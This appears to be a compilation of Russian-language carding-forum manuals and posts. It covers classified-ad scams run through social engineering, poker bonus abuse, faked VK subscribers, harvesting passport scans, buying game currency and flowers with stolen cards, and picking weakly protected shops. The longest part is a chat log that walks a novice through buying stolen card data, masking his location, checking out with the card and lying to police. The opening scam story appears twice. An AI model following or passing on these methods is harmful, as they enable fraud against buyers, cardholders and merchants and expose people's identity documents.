По началу для работы были подготовлены левые симки, телефон, компьютер...
О какой либо безопасности я тогда не то, что не думал - я о ней даже и не знал.
Поэтому подстраховкой были, как уже изложено выше, левые телефон, сим, ноут + бесплатный WiFi в кафе.
Начал осуществлять задуманное. Нашел на просторах интернета фото товара, его характеристики и постарался узнать о нем как можно больше. Разместил объявления по различным доскам, на каждой
доске по 4-5 объявлений из разных городов. В итоге получилось около 25 объявлений - по 5 штук в каждом крупном городе. Телефон указывал своей левой симки.
Через час посыпались звонки. Звонки были от частных лиц и от компаний, которые владели подобным товаром. Вторым я естественно говорил, что товар уже продан. Частников же я начинал обрабатывать.
Начинал я всегда с того, что переёзжаю/спешу/работаю, поэтому цена за товар 50-60 т.р.(рыночная 80 т.р.).
Далее начиналась долгая и упорная СИ. После "обработки" я сообщал неожиданную новость. Новость
о том, что я нахожусь в маленьком, отдаленном от всех этих пяти крупных, городишке.
После этого покупатели либо мгновенно сливались, либо начинали "вместе со мной" озадаченно думать, как же совершить сделку.
Далее снова СИ, много СИ.
В итоге покупатель либо говорил, что приедет, после чего я плавно сливался, либо предлагал вариант пересыла. Тем, кто предлагал пересыл, я говорил, что все узнаю и перезвоню. Далее мариновал день-два. Покупатели начинали сами перезванивать, ведь за такие деньги данный товар хотели получить все.
В этот момент они были уже практически на крючке, нужно было только правильно подсечь.
Снова СИ. Внушение покупателю мысли о том, что товар невозможно отправить наложенным
платежом и предъявление различных доказательств этого.
Из ~50 звонков до этого этапа дошли только 1-2 покупателя.
Я понял, что цель уже близко и надо обрабатывать их до конца...
В то же время начинали подкрадываться мысли, что все это нехорошо и неправильно, но я четко
понимал, что либо я, либо меня, ибо опыт был - собственно, если бы не этот опыт, то так быстро до
этой темы я б и не додумался. Решено. Дожимаем.
Вдохнув полной грудью воздуха, пропитанного авантюризмом и адреналином, выхожу из дома и по уже знакомому маршруту иду в кафе.
Звоню. Поднимают трубку, расспрашивают что там с пересылом. Я в очередной раз повторяю, что наложенным платежом не получится, говорю, что звонил в транспортные компании, а они с наложкой работают только при заключении договора на постоянное сотрудничество по пересылу... А в
большинстве так и есть, потому что я реально туда звонил, чтоб проработать легенду.
Получаю ответ: "Ясно. Как тогда?"
Настало время моего хода, ибо до этого покупатель думал, что он всё решает и от него все зависит.
Я предлагаю перевод на банковскую карту, тут же, применяя СИ, объясняю, что она оформлена на паспортные данные и он меня без труда найдет если что.
Возникают первые сложности.
Покупатель просит подробное фото товара и сканы моих документов.
Сразу скажу, сканы не проблема, да... Но подробные фото. С этим проблемка.
Товар специфический и мне ну никак не подобраться нему, чтобы сделать фото в тех ракурсах, которые он запрашивает.
Я вздыхаю, говорю, что это все сложно и придется подождать 1-2 дня.
Он отвечает, что готов ждать.
Я понимаю, что он может сорваться... и предлагаю ему заснять товар на видео со всех сторон с подробным описанием и комментариями.
О какой либо безопасности я тогда не то, что не думал - я о ней даже и не знал.
Поэтому подстраховкой были, как уже изложено выше, левые телефон, сим, ноут + бесплатный WiFi в кафе.
Начал осуществлять задуманное. Нашел на просторах интернета фото товара, его характеристики и постарался узнать о нем как можно больше. Разместил объявления по различным доскам, на каждой доске по 4-5 объявлений из разных городов. В итоге получилось около 25 объявлений - по 5 штук в каждом крупном городе. Телефон указывал своей левой симки.
Через час посыпались звонки. Звонки были от частных лиц и от компаний, которые владели подобным товаром. Вторым я естественно говорил, что товар уже продан. Частников же я начинал обрабатывать.
Начинал я всегда с того, что переёзжаю/спешу/работаю, поэтому цена за товар 50-60 т.р.(рыночная 80 т.р.).
Далее начиналась долгая и упорная СИ. После "обработки" я сообщал неожиданную новость. Новость о том, что я нахожусь в маленьком, отдаленном от всех этих пяти крупных, городишке.
После этого покупатели либо мгновенно сливались, либо начинали "вместе со мной" озадаченно думать, как же совершить сделку.
Далее снова СИ, много СИ.
В итоге покупатель либо говорил, что приедет, после чего я плавно сливался, либо предлагал вариант
пересыла. Тем, кто предлагал пересыл, я говорил, что все узнаю и перезвоню. Далее мариновал день-два. Покупатели начинали сами перезванивать, ведь за такие деньги данный товар хотели получить всё.
В этот момент они были уже практически на крючке, нужно было только правильно подсечь.
Снова СИ. Внушение покупателю мысли о том, что товар невозможно отправить наложенным платежом и предъявление различных доказательств этого.
Из ~50 звонков до этого этапа дошли только 1-2 покупателя.
Я понял, что цель уже близко и надо обрабатывать их до конца...
В то же время начинали подкрадываться мысли, что все это нехорошо и неправильно, но я четко понимал, что либо я, либо меня, ибо опыт был - собственно, если бы не этот опыт, то так быстро до этой темы я б и не додумался.
Решено. Дожимаем.
Вдохнув полной грудью воздуха, пропитанного авантюризмом и адреналином, выхожу из дома и по уже знакомому маршруту иду в кафе.
Звоню. Поднимают трубку, расспрашивают что там с пересылом. Я в очередной раз повторяю, что наложенным платежом не получится, говорю, что звонил в транспортные компании, а они с наложкой
работают только при заключении договора на постоянное сотрудничество по пересылу... А в большинстве так и есть, потому что я реально туда звонил, чтоб проработать легенду.
Получаю ответ: "Ясно. Как тогда?"
Настало время моего хода, ибо до этого покупатель думал, что он все решает и от него все зависит.
Я предлагаю перевод на банковскую карту, тут же ,применяя СИ, объясняю, что она оформлена на паспортные данные и он меня без труда найдет если что.
Возникают первые сложности.
Покупатель просит подробное фото товара и сканы моих документов.
Сразу скажу, сканы не проблема, да... Но подробные фото. С этим проблемка.
Товар специфический и мне ну никак не подобраться нему, чтобы сделать фото в тех ракурсах,
которые он запрашивает.
Я вздыхаю, говорю, что это все сложно и придется подождать 1-2 дня.
Он отвечает, что готов ждать.
Я понимаю, что он может сорваться...... и предлагаю ему заснять товар на видео со всех сторон с подробным описанием и комментариями.


Mini-Poker

На скорую руку пища для размышления, у фтп и старзов есть инста вывод суммы депа на некоторые платёжки. Делаем реал акк на доки (если выйграем могут запросить) депаем 150$ чистых играем в снг 1х1 на 100-115 выигрываем у нас чистых 100 прибыли, проиграли сливаем карж на оставшиеся 35-50 и выводим инстой сумму депа + сверху карж чтоб поставить на вывод и попытать удачу. Делал в фтп так сам когда оставался карж 3 раза, 2 выигрышные играл после выйгрыша 100 еще на 200 чистых и выигрывал, 1 раз проиграл слил и вывел инстой сумму депа. У старзов не пробовал политка таже, только вроде 48 ч. после депа, но инста вывод суммы депа есть. А какие платёжки это гуглите пробуйте или уже знаете сами.

Накрутка подписчиков в паблик ВК

Всем прив, сегодня я расскажу вам способ относительно дешевого нагона подписчиков в ваш паблик ВК.
Надеюсь что все знают такой сервис как ВТОПЕ, для тех кто не в курсе - это сервис где от имени твоего акка происходит автоматическое выполнение определенных заданий, и за это тебе начисляют баллы которые ты можешь потратить на множество сервисов в том числе и в ВК, и соответственно обменять баллы на подписчиков в паблик.
Аки я покупаю в djekxa.com, брать нужно только тех у кого друзей от 100 шт, соответственно доим каждый акк по максимуму, у меня акк живет 2-3 дня и приносит около 600 поинтов - а это 600 подписчиков.
А теперь расскажу не много о работе моего паблика. Паблик у меня имеёт спортивную тематику, качественно выполнен дизайн, наполняю его сам при помощи сервиса отложенного автопостинга
Буззлайк. Каждый час у меня добавляется 2 поста, постинг осуществляется с 9:00 до 21:00 по местному времени, и того у меня 24 поста в день. Материал для наполнения беру в смежных пабликах, если есть уникальный мат то это только + для вашего паблика.
Теперь о статистике в день я нагоняю не болеё 200 подписчиков (чтоб меньше привлекать внимание админов ВК), около 20 чел у меня выходит из группы в тот же день, дальше текучка уменьшается в геометрической прогрессии. Паблик был создан в 2013 году доведен до 900 подписчиков и заброшен, сейчас около 1500 вступивших.
По поводу блока паблика, за год из моих 6 пабликов блокнули только один он был с тематикой "юмор", причина хз, другие живут до сих пор и активно накручиваются. Периодически раз в 2-3 дня чищу группу от собак.
В итоге получается что за 2,5 руб я получаю около 600 подписчиков, для сравнения ВТОПЕ Платинум один подписчик стоит 1 руб, на Античате 500 офферов (без гарантии и без критерия) стоит 59 руб.
Есть конечно вероятность блока вашего паблика но она маловероятна, так как если вы закажете у сторонника услуги продвижения вашей группы, то в большинстве случаев они нагоняют вам офферов по вашей же схеме, а это те же яйца только вид с боку.
Так что постоянно наполняйте интересным матом ваш паблик, введите постоянные рубрики, не плодите хаос, накручивайте в разумных пределах и будет вам счастье.


Добываем сканы паспортов

Всем привет!
Способ хоть и известен многим, но надеюсь пригодится кому-нибудь.
Итак:
1. В меню на странице ВК жмем "Мои настройки". Там на вкладке "Общие" ставим чекбокс напротив "Документы". Пункт появляется в меню.
2. Жмём в меню на "Документы", вводим в поиске "паспорт".
Желаю успехов!


Заработок на игровой валюте

Многие из вас слышали о заработке на играх, к примеру дота, стим, но почему-то тему развивать дальше мало кто хочет. На самом деле данное направление может быть очень прибыльным и интересным. Сегодня в качестве примера мы разберем игру Фифа, но это может быть и любая другая игра (главное чтобы был спрос на товар в игре). Кардить мы будем монеты, основную валюту это игры. Ну а теперь к делу.
Находим сайт (посредник, не офф) который продает нам монеты, благо таких сайтов много. Важно найти менеё задроченный шоп, чтобы при покупке коинов не просили сканы и прозвоны. Должен заметить что на подобных сайтах фрод не очень сильный и вбить его не так сложно. Пример такого сайта http://www.fifa14coinsforsale.com (уже задрочен скореё всего). Далее вбиваем как обычно, я раньше бил палкой с логов, думаю с сс будет проще, по сути все, теперь только осталось пока коины упадут. Получать монеты можно на любой аккаунт, можно сразу на аккаунт того человека кому вы перепродаёте их. Преимущество тут в том, что нету никаких отзывов и прочего. Т.е. человек видит только название твоего клуба, никаких локов аккаунтов не было, и болеё того делалось на 1 аккаунт с нескольким палок.
Скажу честно, игры не совсем мое, поэтому работал я мало, но пробовал бить много куда. Даже офф Линейка скушала палку с логов. И я думаю не стоит объяснять, что не надо делать вбивы на 200+ долларов.
На уникальность не претендую, но надеюсь расширю ваш кругозор. Всем удачных вбивов!


[Мануал] Делаем цветы. Для тех, у кого совсем нет опыта.

В общем попросил меня товарищ $ZZ$ объяснить ему, как делать цветы.
Так получилось, что мне как раз надо было делать другу букетик
В итоге мы освоили технику синхронного вбива и повеселились, оба вбива прошли успешно.

На самом деле получилассь очень подробная, разжеванная инструкция.
Читайте, веселитесь, вбивайте.

ВСЕ В ВИДЕ ЛОГОВ. Переписка:
(0:27:21) zapresheno: поможешь мне может шипнуть цветЫ)
(0:27:31) DrPunisher: хах) Давай)
(0:27:42) zapresheno: я просто первый раз вообще
(0:27:54) DrPunisher: Да я понимаю) Не вопрос)
(0:27:57) zapresheno: куль завтра у дочки ДР
(0:28:11) DrPunisher: Слушай, кстати
(0:28:25) DrPunisher: не факт, что они завтра 100% приедт
(0:28:41) zapresheno: дак это пех, главное чтоб вваще пришли
(0:28:54) DrPunisher: А, ну тогда вообще не вопрос
(0:29:11) zapresheno: так с чего начать... мыло я уже регнул сёня
(0:29:23) zapresheno: терь чё ssh взять юсы?
(0:30:15) DrPunisher: Бери ssh под тот город, где их много разных
(0:30:21) DrPunisher: т е под крупный
(0:30:26) zapresheno: ок ща
(0:33:23) zapresheno: так всё норма
(0:34:06) DrPunisher: Поставил туннель на виртуаку?
(0:34:28) zapresheno: да бос
(0:34:32) DrPunisher: хорошо
(0:34:50) DrPunisher: заходи на whoer.net
(0:34:56) zapresheno: уже сделал это
(0:35:01) DrPunisher: блэки?
(0:35:05) DrPunisher: нет?
(0:35:13) DrPunisher: время совпадает?
(0:36:25) zapresheno: ща время делаю
(0:36:52) zapresheno: всё гуд
(0:36:59) DrPunisher: хорошо
(0:37:05) DrPunisher: зип там показан?
(0:37:10) zapresheno: да
(0:37:15) DrPunisher: копируй зип
(0:37:20) DrPunisher: иди на байпасс
(0:37:28) DrPunisher: ищи карту с этим зипом
(0:37:44) zapresheno: понял ща
(0:38:19) DrPunisher: желательно, чтоб процент валида был написан
(0:38:34) DrPunisher: то есть "низкий" не бери
(0:38:45) DrPunisher: я беру только карты по 3.60
(0:38:57) DrPunisher: то есть те, что классом выше
(0:39:02) zapresheno: пждц только 1 карта )
(0:39:13) DrPunisher: Подходит по моим параметрам?
(0:39:28) zapresheno: цена да валид 62.85
(0:39:35) DrPunisher: отлично
(0:39:41) DrPunisher: данные там все есть
(0:39:47) DrPunisher: у адреса галка стоит?
(0:40:01) zapresheno: крест
(0:40:24) DrPunisher: Не знаю, насколько я прав, но я такие не беру
(0:40:30) DrPunisher: хотя может и зря
(0:40:33) DrPunisher: смотри сам
(0:40:40) zapresheno: чё тогда лучше другой тунель вщять
(0:40:45) DrPunisher: берем эту, либо меняем туннель
(0:40:56) zapresheno: тунель ща другой возьму лучше
(0:41:02) DrPunisher: приступай
(0:41:10) zapresheno: как всё чекну, те дам знать
(0:47:01) zapresheno: нашёл того же города да же всё есть кроме уровня карты
(0:47:13) zapresheno: ну там classic и т.п а тут пусто
(0:47:19) DrPunisher: понял
(0:47:25) DrPunisher: давай попробуем её
(0:47:26) zapresheno: катит?
(0:47:35) DrPunisher: зип совпадает, да?
(0:47:54) zapresheno: и зип и город, если просто зипу то есть карты classik
(0:48:26) DrPunisher: хорошо, покупай её, но не открывай
(0:48:45) zapresheno: пустую?
(0:49:45) zapresheno: вообщем беру тогда которая по городу зип и город совпадает
(0:49:49) DrPunisher: Если все совпадает, то можно и её, можешь классик взят, нам в принципе 250$ надо
(0:50:04) DrPunisher: на большинстве карт они есть
(0:50:38) zapresheno: там смотри нажал купить и табличка, открыть на проверку и т.п рядом галочки
(0:50:57) DrPunisher: оставь тоько перейти в покупку
(0:51:01) DrPunisher: и покупай
(0:51:30) zapresheno: всё гуд
(0:51:42) DrPunisher: Хорошо
(0:51:52) DrPunisher: ты это все на виртуалке делал?
(0:52:13) DrPunisher: или нет?
(0:52:20) zapresheno: мля у меня несколько виртуалок запущенно, где буду шопиться ни чё не делал кроме whoer
(0:52:32) DrPunisher: хорошо
(0:52:55) DrPunisher: на вбивальной виртуалке закрывай все и чисти клинером
(0:53:02) zapresheno: ok
(0:53:46) zapresheno: готово
(0:54:02) DrPunisher: хорошо
(0:54:11) DrPunisher: заходим в браузер
(0:54:15) DrPunisher: открываем гугл
(0:54:27) DrPunisher: пишем flora queen
(0:54:41) DrPunisher: переходим на сайт
(0:55:07) DrPunisher: слева выбираем доставку в россию
(0:55:18) zapresheno: сразу
(0:55:22) zapresheno: или полазить на нём сначала
(0:55:34) DrPunisher: открой пару вкладок
(0:55:40) DrPunisher: 4-5
(0:56:46) DrPunisher: Хватит лазить)
(0:56:53) DrPunisher: выбирай доставку в ру
(0:57:05) zapresheno: Ы)
(0:57:32) zapresheno: всё
(0:57:51) DrPunisher: так, хорошо, выбирай букет, че
(0:59:12) zapresheno: слушай
(0:59:19) zapresheno: а чё там чётное количество только
(0:59:23) zapresheno: роз )
(0:59:26) DrPunisher: Не везде)
(0:59:30) DrPunisher: Есть по 25
(0:59:41) DrPunisher: красные, розовые
(0:59:51) DrPunisher: я вчера шипал, норм такие)
(1:00:08) DrPunisher: Сейчас, кстати, параллельно с тобой делаю тоже букет)
(1:00:37) zapresheno: Ы) а у тебя бухло в наборе было
(1:00:40) zapresheno: или отдельно
(1:00:50) DrPunisher: все в переди, не спеши)
(1:00:53) DrPunisher: выбрал?
(1:01:31) zapresheno: да
(1:01:55) DrPunisher: Хорошо, ну мы ж не лохи...тыкай premium)
(1:02:02) zapresheno: Ы)
(1:02:20) zapresheno: ок
(1:02:23) DrPunisher: тыкай на календарик, выбирай ближайшую возможную дату
(1:02:42) zapresheno: на завтра
(1:02:49) zapresheno: тыкнул
(1:02:59) DrPunisher: нажимай продолжить
(1:03:14) DrPunisher: выбирай мишку и белое вино
(1:03:19) DrPunisher: а то не пройдет
(1:03:22) DrPunisher: шутка)
(1:03:24) zapresheno: Ы)
(1:03:39) DrPunisher: бери 2, максимум 3 чего - либо
(1:03:54) zapresheno: ок
(1:04:01) zapresheno: чё континюе?
(1:04:21) zapresheno: ааа адрес терь шоль вбивать?
(1:04:23) DrPunisher: я взял красное вино и большого медведя)
(1:04:32) zapresheno: аналогично ватсон )
(1:04:42) DrPunisher: так, теперь ии на байпас
(1:04:59) zapresheno: ок
(1:05:09) DrPunisher: тыкай показать карту в цсв
(1:05:14) DrPunisher: но не открывай
(1:05:16) DrPunisher: пока что
(1:05:57) zapresheno: ок
1:05:58) DrPunisher: вид такой будет
(1:05:59) DrPunisher: AMEX#Adam xxxxx#3772929xxxxxx03#xxxx#201612#Los Angeles#616 St.Paxxxxxxxxxx#90017#1
(1:06:13) DrPunisher: тебе там все понятно?
(1:06:16) DrPunisher: что где?
(1:06:37) zapresheno: 3713452xxxxxx01:12/16:xxxx:1273 66txxxxxxxx:94608 number:exp:cvv2:address:zip
(1:06:40) zapresheno: такой у меня
(1:07:03) DrPunisher: так, давай сходим в настройки на байпассе
(1:07:16) zapresheno: уже
(1:07:17) DrPunisher: профиль
(1:07:27) DrPunisher: параметры вывода цсв
(1:07:48) zapresheno: что добавить что убрать?
(1:08:00) DrPunisher: Мне удобно так:
(1:08:07) DrPunisher: сверху вниз
(1:08:12) DrPunisher: брэнд
(1:08:15) DrPunisher: холдер
(1:08:19) DrPunisher: намбер
(1:08:24) DrPunisher: цвв2
(1:08:30) DrPunisher: эксп
(1:08:39) DrPunisher: city
(1:08:43) DrPunisher: adress
(1:08:46) DrPunisher: zip
(1:08:48) DrPunisher: phone
(1:08:56) DrPunisher: ничего лишнего
(1:09:36) zapresheno: всё сохранил
(1:10:02) DrPunisher: снова отображаем купленну карту в цсв
(1:10:13) DrPunisher: AMEX#Adam xxxxx#3772929xxxxxx03#xxxx#12/16#Los Angeles#616 St.Paxxxxxxxxxx#90017#1
(1:10:35) zapresheno: просмотреть нужно нажать?
(1:10:40) DrPunisher: пока не
(1:10:53) zapresheno: у меня просто нет больше этих пунктов
(1:10:53) DrPunisher: ну это сугубо мой способ)
(1:11:00) DrPunisher: каких?
(1:11:09) zapresheno: cvv2
(1:11:23) zapresheno: я перешёл в список покупок
(1:11:38) zapresheno: там карта и ниже написано редактировать примечание или удалить
(1:11:42) DrPunisher: а, блин
(1:11:44) DrPunisher: да
(1:11:48) DrPunisher: посмотреть
(1:11:57) DrPunisher: там просто как папки
(1:12:15) DrPunisher: если за раз купишь 5 карт, они все будут в одной папке
(1:12:27) zapresheno: всё гуд
(1:12:33) DrPunisher: открыл, да?
(1:12:37) zapresheno: да
(1:12:40) zapresheno: амекс карта
(1:12:44) DrPunisher: хорошо
(1:12:55) DrPunisher: сфоткай это или перепиши
(1:13:06) DrPunisher: без крестиков конечно)
(1:13:29) DrPunisher: ты сейчас будешь эти данные вводить на виртуалке
(1:13:46) zapresheno: ок
(1:13:51) DrPunisher: в общем сделай, чтоб было откуда смотреть не прыгая по вкладкам
(1:14:04) zapresheno: ты как делаешь?
(1:14:16) DrPunisher: Я фоткаю на телефон просто
(1:14:25) zapresheno: ща я тож тода
(1:15:03) zapresheno: ок
(1:15:13) DrPunisher: хорошо
(1:15:19) DrPunisher: кстати, мыло есть?
(1:15:24) zapresheno: да aol
(1:15:30) DrPunisher: окей
(1:15:37) DrPunisher: идем а флору обратно
(1:15:47) zapresheno: там
(1:15:53) DrPunisher: вводим те данные, которые сфоткали + мыло
(1:16:30) zapresheno: слушай а ты там карт мессадж писал?
(1:16:36) DrPunisher: а, блин, точно
(1:16:54) DrPunisher: меседж можно из предложенных любой ткнуть
(1:17:11) DrPunisher: и, соответственно доставку выбрать до 14 или после 14
(1:17:34) zapresheno: ок
(1:17:49) DrPunisher: тыкаем продолжить
(1:17:52) zapresheno: галку ставить под мессаджом
(1:17:55) zapresheno:?
(1:18:02) DrPunisher: Не
(1:18:09) DrPunisher: вазу мне лично не надо)
(1:18:15) DrPunisher: ты сам смотри)
(1:18:23) zapresheno: ухахахахах
(1:18:37) zapresheno: если добавить то пех?
(1:18:39) zapresheno: или не стоит?
(1:18:53) DrPunisher: Не пробовал) Давай пока без неё)
(1:19:07) DrPunisher: Дале заполняем
(1:19:16) zapresheno: ок
(1:19:22) DrPunisher: под цифрой 1
(1:19:26) DrPunisher: данные наши
(1:19:32) DrPunisher: куда цветы придут
(1:19:43) DrPunisher: я пишу Mr
(1:19:59) DrPunisher: vladimir putin например
(1:20:03) DrPunisher: и Далее
(1:20:15) DrPunisher: улица
(1:20:20) DrPunisher: номер дома
(1:20:26) DrPunisher: без квартиры
(1:20:30) DrPunisher: и город
(1:21:12) zapresheno: сделано
(1:21:36) DrPunisher: улица боярского будет Boyarskogo st.
(1:21:44) zapresheno: мля намбер же нужно ещё
(1:22:03) zapresheno: а если васильева
(1:22:39) DrPunisher: Vasil'eva st напиши
(1:22:49) DrPunisher: все равно это русские разбирать будут
(1:22:53) DrPunisher: они поймут
(1:23:06) zapresheno: ок
(1:23:26) zapresheno: намбер указать?
(1:23:32) zapresheno: на которм я буду сидеть так?
(1:23:39) DrPunisher: Да
(1:23:45) DrPunisher: в формате
(1:23:56) DrPunisher: +7хххххххххх
(1:24:26) DrPunisher: галку ниже уберем
(1:27:27) DrPunisher: Готово
(1:27:29) DrPunisher:?
(1:28:03) zapresheno: да
(1:28:13) DrPunisher: хорошо
(1:28:25) DrPunisher: идем на флору, вписываем
(1:28:40) DrPunisher: имя
(1:28:47) DrPunisher: холдера
(1:28:53) DrPunisher: город холдера
(1:28:55) DrPunisher: зип
(1:29:20) DrPunisher: выбираем страну юнайтед стэйтс
(1:29:39) DrPunisher: НАШ емэйл
(1:30:20) DrPunisher: Готово?
(1:30:32) zapresheno: сек
(1:30:34) DrPunisher: ок
(1:31:14) zapresheno: ок, имя Sharon баба или мужик или это ваще пех
(1:31:28) DrPunisher: В принципе пох
(1:31:32) DrPunisher: но баба
(1:31:34) zapresheno: всё ок тогда
(1:31:36) zapresheno: Далее
(1:31:51) DrPunisher: сейчас слушай
(1:31:59) DrPunisher: сейчас мы пойде на байпас
(1:32:18) DrPunisher: там откроем карту
(1:32:30) zapresheno: ок там
(1:32:41) DrPunisher: погоди
(1:32:44) DrPunisher: дослушай)
(1:32:50) zapresheno: всё понял слушаю
(1:32:51) DrPunisher: после этого нажмем показать в цсв
(1:33:04) DrPunisher: сфоткаем уже открытые данные
(1:33:21) DrPunisher: пойдем на флору и дозаполним все, что осталось
(1:33:46) zapresheno: а номер телефона какой писать ейшний?
(1:33:56) DrPunisher: да
(1:33:57) zapresheno: т.е ходера
(1:33:58) zapresheno: ок
(1:34:12) DrPunisher: в биллинге ВСЕ данные холдера
(1:34:25) DrPunisher: в т.ч. телефон
(1:34:28) DrPunisher: после этого нажмем апрув ордер
(1:34:32) zapresheno: ясно
(1:34:34) DrPunisher: и подтвердим
(1:34:47) DrPunisher: если карта зайдет, все отлично
(1:34:58) zapresheno: всё тогда удачи бро ) ща как сделаю отпишу
(1:35:02) DrPunisher: если нет, то мы пойдем на байпас
(1:35:16) DrPunisher: и нажмем проверить карту
(1:35:28) DrPunisher: Ясно все?)
(1:35:34) zapresheno: ок всё
(1:35:37) zapresheno: я приступаю
(1:35:46) DrPunisher: Если зайдет, мы её не проверяем
(1:35:58) zapresheno: ок
(1:36:00) zapresheno: погнали
(1:37:35) DrPunisher: номер холдера пишем без единицы в начале
(1:38:08) DrPunisher: бля
(1:38:18) DrPunisher: туда кажись амекс не лезет
(1:38:41) DrPunisher: вот же ж говно
(1:39:49) zapresheno: мля
(1:39:58) zapresheno: amex нету там шоль )
(1:40:00) DrPunisher: идем на байпас
(1:40:08) DrPunisher: берем не амекс
(1:40:21) DrPunisher: идем обратно на флору
(1:40:33) DrPunisher: вбиваем данные с новой карты
(1:40:38) zapresheno: а то что я случайно апрув нажал пехй?
(1:40:44) zapresheno: но ещё всю инфу не вбил
(1:40:56) DrPunisher: думаю, что пох
(1:41:05) DrPunisher: может ты косолапый америкос
(1:41:11) DrPunisher: всякое бывает)
(1:41:20) DrPunisher: правдоподобность наше все)
(1:41:43) zapresheno: Ы)
(1:41:54) zapresheno: а как понять амекс не амекс?
(1:42:08) DrPunisher: Наводишь на бин
(1:42:12) DrPunisher: и он пишет
(1:43:12) zapresheno: есть не амес но город другой будет
(1:43:16) zapresheno: зип этот же
(1:43:28) DrPunisher: Это бывает
(1:43:30) DrPunisher: норм
(1:43:39) zapresheno: лио ща 3бакса
(1:43:43) zapresheno: брать с таким же городом
(1:43:50) zapresheno: либо за $3
(1:43:53) zapresheno: чё лучше
(1:44:07) DrPunisher: по зипу бери
(1:45:51) DrPunisher: у меня тоже был амекс
(1:46:00) DrPunisher: я сменил на мастеркард
(1:46:03) DrPunisher: все зашло)
(1:46:06) DrPunisher: Stephanie, thank you for choosing FloraQueen! We have sent you an email confirming your order nº 20797077. Please remember to check your spam folder just in case the confirmation email was delivered there instead of your inbox. The email also contains information to access your personal account at My FloraQueen, where you will be able to view your order.
(1:46:07) zapresheno: я на визу ща сек
(1:47:46) DrPunisher: Только ВСЕ данные поменяй
(1:47:55) DrPunisher: Не пропусти ничего
(1:50:28) zapresheno: бро
(1:50:32) zapresheno: ну всё гуд вроде
(1:50:38) zapresheno: ща на мыло бегу провер.
(1:50:39) zapresheno: ю
(1:50:59) DrPunisher: Зашла?
(1:51:18) zapresheno: дак да зашла норма ваще
(1:51:37) zapresheno:, where you will be able to view your order. personal account at My FloraQueen
(1:51:46) DrPunisher: Ну красавец) Поздравляю)
(1:52:04) zapresheno: мля бро ваще, ты не представляешь какой я довольный сижу ща )))
(1:52:10) zapresheno: с меня cc короче !
(1:52:11) DrPunisher: хах)
(1:52:20) DrPunisher: Вопросы остались какие-то?
(1:52:30) zapresheno: по этому ваще всё чётко опиал
(1:52:34) zapresheno: я вообще в шоке мля )
(1:52:45) zapresheno: я бы сам, скажу честно столько бы ошибок наделал пздц просто
(2:16:14) zapresheno: мля я вот думаю у меня будут нет доки просить
(2:16:19) zapresheno: чтоб получить цветы
(2:16:29) DrPunisher: Очень маловероятно
(2:16:33) DrPunisher: если что
(2:16:38) zapresheno: куль у мну город то маленький так то )
(2:16:40) DrPunisher: забыл
(2:16:44) DrPunisher: потерял
(2:16:47) DrPunisher: не найти
(2:16:52) DrPunisher: придумаешь
(2:17:11) DrPunisher: Почему номер квартиры не указан тоже могут спросить
(2:17:29) DrPunisher: скажешь, что офис/общага
(2:17:38) DrPunisher: и курьеру все равно не пройти
(2:17:59) zapresheno: ты в мильоннике походу живёшь?)
(2:18:00) DrPunisher: или что ты указал домашний адрес, а сам будешь на работе, рядом
(2:18:21) DrPunisher: и ты не знаешь, где будешь в тот момент, когда привезут
(2:18:23) DrPunisher: СПб)
(2:18:28) zapresheno: ухахахах
(2:18:39) zapresheno: дак канешь у тя то кули там
(2:18:44) zapresheno: можно всё что угодно наплести
(2:18:52) zapresheno: у мну то пздц мля
(2:19:01) zapresheno: 300к народу )
(2:19:45) zapresheno: чё думаешь есть риск, что из за этих цветов будут ганашиться легавые?)
(2:19:58) DrPunisher: не
(2:20:01) DrPunisher: если что
(2:20:02) zapresheno: хуль так то
(2:20:04) DrPunisher: кстати
(2:20:06) zapresheno: хуйня же это
(2:20:15) DrPunisher: если вдруг какие вопросы
(2:20:19) DrPunisher: у кого то
(2:20:36) zapresheno: я фот думаю ещё, что не факт что у меня ф городе вообще есть ихняя контора )
(2:20:42) DrPunisher: то ты просто лазил в инете и искал дешевые цветы
(2:21:10) DrPunisher: зашел на какой-то (не помнишь какой) форум и нашел там объявление
(2:21:22) DrPunisher: что человек делает дешевые цветы
(2:21:37) DrPunisher: написал ему, он тебе скинул фотки
(2:21:44) DrPunisher: ты выбрал и заказал
(2:21:56) DrPunisher: отдав предоплату и указав свои данные
(2:22:00) DrPunisher: Все
(2:22:06) DrPunisher: к тебе вопросов нет
(2:22:15) DrPunisher: Почему левые данные?
(2:22:21) DrPunisher: Потому что он так сказал
(2:22:33) DrPunisher: А ты гнался за халявой
(2:22:55) zapresheno: да мля
(2:23:01) zapresheno: я думаю что ваще всем поуй будет
(2:23:14) zapresheno: из за такой мелочи
(2:23:19) zapresheno: не будут искать
(2:23:32) DrPunisher: вот именно Охренеть, только сечас понял, что мы 2 часа вбивали цветы


Поиск шопов - Замена PR

Google в очередной раз заявил, что может перестать обновлять тулбарный PageRank. Это значит что у
новых шопов мы не узнаем PR.
Проанализировали взаимосвязь между Google PR и тремя показателями – авторитетностью домена
(Domain Authority), его трастом и цитируемостью (Trust Flow, Citation Flow).
Корелляция между PR и Domain Authority составила 0.787
Между PR и Trust Flow – 0.746
Между PR и Citation Flow – 0.814

Приведу пару примеров:
http://www.flora2000.com/ pr3 DOMAIN AUTHORITY 41 /100 Check
http://www.altitude-sports.com pr4 DOMAIN AUTHORIT 40 /100 Check
Apple.com pr 9 DOMAIN AUTHORITY 100 /100 Check
Проводя аналогию с PR, можно вывести следующеё, искать шопы с Domain AUTHORITY как можно меньше. Я проверил свои щлющие шопы у них очень низкий показатель.
Прошу по возможности вставить данную статью в методичку, ибо гугл давно забил на пр


Эффективность управления временем при вбиве

Так как наша работа это сплошной вбив, то нужно уметь правильно организовать свое рабочеё пространтство, ведь чем все практичнеё и удобнеё, тем больше карт мы сможем вбить и как следствие увеличить профит. Данную схему мне дал один человек и она мне очень приглянулась, надеюсь и вам понравится.
1) Регистрация и пользование имеилами. Всем стафферам я рекомендую использовать имеилы самых крупных сервисов, таких как Hotmail, Yahoo, Gmail итд. Чекать имеили удобнеё всего через Thunderbird работающий через сокс. Держать почтовый клиент следует на отдельной витруальной виндовс ХР. При активной работе вы будете регистрировать каждый день по 3-4 имеила. За неделю набегает 21-28 имеилов. Проверять их все через браузер – очень трудоемкая и рутинная задача.
2) Рабочеё пространство при вбиве должно быть организовано следующим образом.
Т.е. данные карты, дропа и имеил должны быть всегда навиду, в узком текстовом файле на 3 строчки.
